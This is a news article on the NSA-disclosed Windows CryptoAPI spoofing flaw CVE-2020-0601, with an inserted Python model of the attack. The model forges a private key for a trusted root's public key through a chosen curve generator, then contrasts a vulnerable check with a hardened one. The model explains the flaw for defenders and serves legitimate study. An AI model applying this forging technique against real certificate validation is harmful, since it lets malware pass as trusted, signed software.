The United States National Security Agency (NSA) has uncovered and disclosed a serious security flaw in the Windows CryptoAPI (crypt32.dll) on Windows 10 and Windows Server 2016 and 2019. Publicly announced by the intelligence agency, the vulnerability, tracked as CVE-2020-0601, lies in how CryptoAPI validates Elliptic Curve Cryptography (ECC) certificates: the X.509 certificates and digital signatures used to authenticate HTTPS connections, applications and executable code.

Described by security journalist Brian Krebs as being “extraordinarily serious”, the bug, left unpatched, could allow malicious actors to spoof certificates from a trusted certificate authority and so disguise malware or other nefarious software without the operating system detecting it or the user's knowledge.
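To make the spoofing concrete, here is a simplified model of the trust-anchor check, added as an example for this page and not code from Microsoft, the NSA or the original article. It assumes NIST P-256, a textbook ECDSA written inline (not constant-time, for illustration only) and a constructed trusted root; the names `vulnerable_is_trusted`, `hardened_is_trusted` and `forge_root_key` are this example's own. It models the underlying flaw in CVE-2020-0601: an ECC certificate may carry explicit curve parameters instead of a named curve, and a check that matches a trusted root by public key point alone lets an attacker who sets the generator G' = d'^-1 * Q_root hold a private key d' for the root's own public key.

```python
import hashlib
import secrets
from dataclasses import dataclass
from typing import Optional, Tuple
# NIST P-256 domain parameters: prime field, curve coefficients, base point G, group order n.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
Point = Optional[Tuple[int, int]]  # None is the point at infinity


def ec_add(p1: Point, p2: Point) -> Point:
    """Affine point addition on P-256 (textbook, not constant-time)."""
    if p1 is None or p2 is None:
        return p1 or p2
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k: int, pt: Point) -> Point:
    acc = None  # double-and-add scalar multiplication
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def ecdsa_sign(d: int, gen: Point, msg: bytes) -> Tuple[int, int]:
    """Textbook ECDSA over whatever generator the caller supplies (that is the point)."""
    h = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    while True:
        k = secrets.randbelow(N - 1) + 1
        r = ec_mul(k, gen)[0] % N
        s = pow(k, -1, N) * (h + r * d) % N
        if r and s:
            return r, s


def ecdsa_verify(q: Point, gen: Point, msg: bytes, sig: Tuple[int, int]) -> bool:
    r, s = sig
    h = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    w = pow(s, -1, N)
    x = ec_add(ec_mul(h * w % N, gen), ec_mul(r * w % N, q))
    return x is not None and x[0] % N == r


@dataclass(frozen=True)
class EccPublicKey:
    """What an X.509 ECC SubjectPublicKeyInfo can carry: a named curve or explicit parameters."""
    named_curve: Optional[str]   # e.g. "P-256"; None when the cert ships explicit parameters
    generator: Tuple[int, int]   # base point the certificate says to use
    public: Tuple[int, int]      # the public key point Q


# Constructed trusted root (hypothetical): an ordinary P-256 key on the named curve.
ROOT_PRIV = secrets.randbelow(N - 1) + 1
ROOT = EccPublicKey("P-256", (GX, GY), ec_mul(ROOT_PRIV, (GX, GY)))
TRUSTED_ROOTS = [ROOT]


def vulnerable_is_trusted(key: EccPublicKey) -> bool:
    """Vulnerable pattern: a root matches if the public key point alone matches."""
    return any(key.public == r.public for r in TRUSTED_ROOTS)


def hardened_is_trusted(key: EccPublicKey) -> bool:
    """Hardened: require a named curve and compare the whole parameter set, not just Q."""
    return any(key.named_curve is not None and key.named_curve == r.named_curve
               and key.generator == r.generator and key.public == r.public
               for r in TRUSTED_ROOTS)


def forge_root_key(root: EccPublicKey) -> Tuple[int, EccPublicKey]:
    """Attacker picks any d' and sets G' = d'^-1 * Q_root, so d' * G' == Q_root."""
    d_forged = secrets.randbelow(N - 1) + 1
    g_forged = ec_mul(pow(d_forged, -1, N), root.public)
    return d_forged, EccPublicKey(None, g_forged, ec_mul(d_forged, g_forged))


def demo() -> dict:
    d_forged, spoof = forge_root_key(ROOT)
    msg = b"constructed sample: a leaf certificate the attacker wants trusted"
    sig = ecdsa_sign(d_forged, spoof.generator, msg)  # signed with the attacker's d'
    return {
        "spoofed_key_equals_root_key": spoof.public == ROOT.public,
        "signature_verifies_with_cert_params": ecdsa_verify(spoof.public, spoof.generator, msg, sig),
        "vulnerable_trusts_spoof": vulnerable_is_trusted(spoof),
        "hardened_trusts_spoof": hardened_is_trusted(spoof),
        "hardened_trusts_real_root": hardened_is_trusted(ROOT),
    }


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the whole chain: the attacker's signature verifies under the parameters the certificate itself supplies, the spoofed key is byte-for-byte the root's key, and the public-key-only match accepts it, whereas insisting on a named curve and comparing the generator rejects it while still trusting the genuine root.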

Made public on 14 January 2020, the flaw was fixed by Microsoft in that day's monthly security update, with the company advising systems administrators to deploy it immediately. Microsoft stated that it had seen no evidence of the vulnerability being exploited, and had worked with operators of key internet infrastructure and military entities to secure their networks before the flaw was announced. Once the update is applied, Windows also records detected exploitation attempts in the Application event log under the source Microsoft-Windows-Audit-CVE (Event ID 1), which defenders can monitor.

“NSA assesses the vulnerability to be severe and that sophisticated cyber actors will understand the underlying flaw very quickly and, if exploited, would render the previously mentioned platforms as fundamentally vulnerable”

National Security Agency

The announcement of this vulnerability comes on the same day that Microsoft ends support for Windows 7. Initially released in 2009, the operating system will no longer receive patches and so can no longer be considered secure; users are strongly advised to update their systems and move away from Windows 7. (Windows 7 itself is not affected by CVE-2020-0601, which concerns ECC certificate validation code introduced in Windows 10.)

As the most widely used desktop operating system, Windows 10, if left unpatched, could have left over 900 million devices vulnerable to attack, again emphasising the importance of vulnerability testing and regular updates. It is not known exactly when the NSA discovered the vulnerability; previous exploits, such as EternalBlue, are believed to have been used by the agency for around five years before being disclosed and fixed.

“[We are] recommending that network owners expedite implementation of the patch immediately as we will also be doing…when we identified a broad cryptographic vulnerability like this, we quickly turned to work with the company to ensure that they could mitigate it.”

Anne Neuberger, NSA’s Cybersecurity Directorate

The disclosure is likely part of a new transparency initiative. The NSA has previously faced criticism for its security and intelligence-gathering practices, and with this disclosure the agency is perhaps hoping to soften its image as well as contributing to industry best practice, much as Google's Project Zero, a security team dedicated to finding and responsibly disclosing zero-day vulnerabilities, does.

As systems administrators work to secure their networks, we are once again reminded of the vulnerabilities that threaten even the most modern and well-defended systems available. Because it undermines the certificate checks that HTTPS, code signing and software updates rely on, CVE-2020-0601, if exploited, could have caused enormous damage and threatened the information security of individuals and organisations the world over.